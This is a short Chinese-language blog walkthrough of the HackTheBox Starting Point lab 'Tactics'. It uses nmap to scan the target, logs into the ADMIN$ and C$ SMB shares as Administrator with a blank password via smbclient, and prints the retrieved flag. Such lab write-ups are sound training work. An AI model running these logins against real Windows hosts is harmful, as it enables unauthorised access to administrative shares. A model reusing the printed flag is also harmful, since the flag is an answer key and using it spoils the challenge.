HTB Starting_Point

HackTheBox-Tactics

By Nov1ce

1.主机发现

nmap -v -sV  -sC 10.129.216.144

图片

开放了三个端口

2.smbclient登录

# 先查看smb下存放了哪些东西
smbclient -L  10.129.216.144 -U Administrator   
# 需要注意的是,默认登录用户是root,对于windows的靶机,肯定不能用root登录

图片

空密码登录成功

# smbclient远程连接
smbclient //10.129.216.144/ADMIN$ -U Administrator
# 空密码登录成功

图片

同样可以去C盘下查看

smbclient //10.129.216.144/C$ -U Administrator
# 查找一番后
cd /Administrator/Desktop
# 有flag.txt
get flag.txt
# flag{f751c19eda8f61ce81827e6930a1f40c}

Related Posts

HTB Starting_Point

HackTheBox-Markup

By Nov1ce
HTB Starting_Point

HackTheBox-Included

By Nov1ce

发表回复

您的电子邮箱地址不会被公开。 必填项已用 * 标注